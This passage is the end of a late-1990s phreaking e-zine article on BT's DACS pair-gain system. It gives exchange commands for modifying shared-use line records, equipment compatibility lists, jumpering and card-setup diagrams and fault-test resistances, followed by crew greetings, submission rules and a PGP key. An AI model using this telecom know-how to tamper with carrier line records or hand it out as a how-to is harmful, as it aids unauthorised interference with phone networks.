customer is using DACS1 or DACS2)

Remote End eXchange records


The Local Network Records (CSS/LNR) are modified/editited as follows on the
O/S at the exchange:

<ESU> ENTER SHARED USE
<MSU> MODIFY SHARED USE
<DRT> DISPLAY ROUTING
<HEH> INVALID COMMAND

Compatability of DACS:

GOOD..

The provision of PSTN services when used with only BABT - approved Customer
Premises Equipment upto 4 REN.

Use of any phone exchange within BT's access network, except the following:

Inter working with all BT's remote line test systems
Self contained payphones
Lines utilising CLASS
K Break
All modems up to 14.4bit/S working
Group 1,2,3 fax machines
Video phones

BAD..

Earth calling PBX's
Equipment that uses SPM (meter pulsed payphones)
Private Services
ISDN2
Steel joint user poles
Certain TXE2 exchanges
300 kilohms loop calling
Electricity stations
DDI
Group 4 fax machines



DACS system schematics, diagrams..


Old Jumpering Procedure


E L
: :
_____________ : : _____________
| | : : | |
| O-:-----. .-:--O |
exchange | O-:---. | | : | | external
<------------O sub number | : | | | : | bar pair O------------>
| | : | | | : | | cable
| | : | | | : | |
|_____________| : | | | : |_____________|
: | | | :
: | | | :
: | | | : _____________
: | | | : | |
: | | | : | DACS block |
: | | | : | | DACS shelf
: | | | : | O------------>
: | | | : | |
: | | | : | T B1 B2 |
: | | | : |_____________|
: | | | : o o o
| | |_______| | |
| |________________| |
|_______________________|



New Jumpering Procedure

E L
: :
_____________ : : _____________
| | : : | |
| | : : | DACS B1 B2 |
exchange | | : : | | DACS shelf
<------------O sub number | : : | O------------>
| O---:----------:---|--O B2 |
| O---:----------:---|--O B1 |
|_____________| : : |_____________|
: :
: :
: :
_____________ : : _____________
| | : : | |
| DACS trunk | : : | |
DACS shelf | | : : | | external
<------------O | : : | bar pair O------------>
| CH2 | : : | | cable
| CH1 O--O---:----------:---O |
|_____________| : : |_____________|
: :
: :

E.U Card Setup



_________________________________________
.--------. | (O) (O) (O) |
| | | | | | | | | | | on |
| | 1 | | | | | | | | | off | 8
| | |_____(O)_(O)_____________(O)_(O)_(O)_____|
| |
| |
| | <-- B.E.R connector
|________|
sw7O9 sw7O3 sw7O6 sw7OO
_____ _____ _____ _____
c | | c | | c | | c | | .--------.
| : | | : | | : | | : | | |
| : | | : | | : | | : | | |
| : | | : | | : | | : | | |
| : | | : | | : | | : | | |
r |_____| r |_____| r |_____| r |_____| | |
b2 b1 a3 a1 | |
|________|



DACS 2A EU
SW 1O1
(imp) (class)
_____ _____ _____ _____ _____ _____ _____ _____
| | | | | | | | cpx | | | | | | | |
| O | | O | | O | | O | 6OO | O | | O | | O | | O |
| | | | | | | | | | | | | | | |
| | | | | | | | | | | | | | | |
| | | | | | | | en | | | | | | | |
|_____| |_____| |_____| |_____| |_____| |_____| |_____| |_____|

1 2 3 4 1 2 3 4


1 SW 1O2 4
_____ _____ _____ _____
| off | | | | | | |
| | | | | O | | O | 1Ok
| | | on | | | | |
| | | | | | | |
| O | | O | | | | | 15k
|_____| |_____| |_____| |_____|

1 2 1 2

(alarm) (sign)



External RU Setup
BT66


white
B1 O--------------.
blue | white
| .-------------.
| | grey |
| | |
| | |
| | |
| | |
| | |
white | | |
B2 O------------. | | |
orange | | | |
| | | |
| | | |
O O O |
|
tail | trunk
O

MIMIC Resistances

switch 5 on (cal)
1k ohm loop
_____ _____
| | | |
C a | | | | a ______
S o--------O | switch 5 off (ug) | O------------O |
S b1 | | 10k ohm -50v leg b2 | | b1 | NTE |
o--------O | | O------------O______|
T b | | | | b
E | O======================O |
S | EU O======================O RU |
T a | | TRUNK | | a ______
o--------O | | O------------O |
A b2 | | | | b2 | NTE |
C o--------O | | O------------O______|
C b | | | | b
E |_____| |_____|
S
S s/c b1 + b2 10k ohm -50v a leg b2 1k ohm loop b1 or b2
EU fault TRUNK fault customer apps fault



Welp, thats it for this DACS oday info. Hope someone can find some use of it,
HEH. Big shouts to gr1p, b4b0, 9x, substance, psyclone & GBH krew, tip, jorge,
lusta, pbxphreak, bodie, zomba, jasun, oclet, knight, epoc, nou, everyone in
#darkcyde, #b4b0, #9x HEH, werd to D4RKCYDE.. 2 years going str0ng.

"that ascii took me fuckin ages.."

the urls..

http://b4b0.org b4b0
http://darkcyde.phunc.com f41th
http://www.ninex.com 9x
http://hybrid.dtmf.org BL4CKM1LK hardcore teleph0n1cs.. (GO NOW!)

ATE/>exit
+++
NO CARRIER


------------------------------------------------------------------------------


B L 4 C K M 1 L K
teleph0nics

FUCKIN HARDCORE, BABY

http://hybrid.dtmf.org/


------------------------------------------------------------------------------

.
:
|
+-+[ outness ]+---> by jasun <-----------------------------------------------+
+-+[ D4RKCYDE ]+---> <----------------------------------------------+
|
:
.

If you would like to submit an article for publication in f41th, please
ensure that it complies to the following:

[ all articles sent to f41th must be original work ]
[ all articles must be at least 15K in size ]
[ all articles must be in pure .txt format ]
[ all articles sent to f41th should not be released anywhere else ]

If you are sending us an article that you want to have published in f41th,
put [ f41th ] in the subject header in enclosed square brackets, all other
mail without that header will be considered as reader feedback mail and will
not appear in f41th. Visit #darkcyde on EFnet and idle with the D4RKCYDE
members, supporters, friends and anyone else who happens to hang out there
and sometimes chat! Use one of the following addresses to send us comments
and articles, you may also use the f41th PGP key to send us secure encrypted
email, which can be found below.

[ hybrid@dtmf.org ]
[ hybrid@ninex.com ]
[ zomba@phunc.com ]

Type Bits/KeyID Date User ID
pub 2048/4D077481 1999/07/30 f41th <http://darkcyde.phunc.com>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQENAzehyBUAAAEIALNZc5Ba1zi7JrAAaJEDSXlnyQv4U47OavbwyXyidvUSv4Js
siVbSAEGlLfGAEgNHgyGHxoJGdMXMoOdFLhlHAT/N6ye4NtaJGloIy34UUPd9+rj
Cb+Yqz/az/Be56QaexDFSqrcOeOEZPCCNzjzlfW8EN23noHIj42zDppkOcd35VCV
0GZ2sZbKqrtfYca1yf0IVe/yoKBVF+TMfftvAO63kJ+rfl5G8t3mU5xbH7fT5UPU
lrmELJf/372F2RZUCCRwWxdo14ymlSW3QVk7L+DynX7dZ9FNyrQ0Wqpyqh8Anctw
O8fxYD+59n+ezuuBUomxmSiPIThFEyt4UU0HdIEABRO0IWY0MXRoIDxodHRwOi8v
ZGFya2N5ZGUucGh1bmMuY29tPokBFQMFEDehyBoTK3hRTQd0gQEBm5IH/0MPx8FO
Gmc0Epr9Zurk2mx9j77ZsqzvS9AkupTD7uV3UdlVGFNcl8oFUVgpUb5JiM4KuXcv
79uGIFfIy0LzCgitjPrl9STjiWHulHfkA9vdY/Tp8K+IFqXaktCagWJV2DNZF/pK
u26BjNE8T3bUNo+9h9dSvzdobs5Hnj+eks5kdI/A49+hIHsrn5SAyllTL5eIsrei
33ZHwrAtu9KnGkV/YZ1a173VW+h715UgXlPtb3xA7WNVcVGQtaAPhRnLBVtDOYgV
+C98dyjuS0/IgL7ZC+RYz3esvFSiKgJibL/4AU6mXUaOHspCt8d3l/aZ5+z+CKmz
uaa7MkTM77rWWMM=
=lLe4
-----END PGP PUBLIC KEY BLOCK-----

#darkcyde EFnet
http://darkcyde.phunc.com
[C] D4RKCYDE Communications

EOF.



















← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT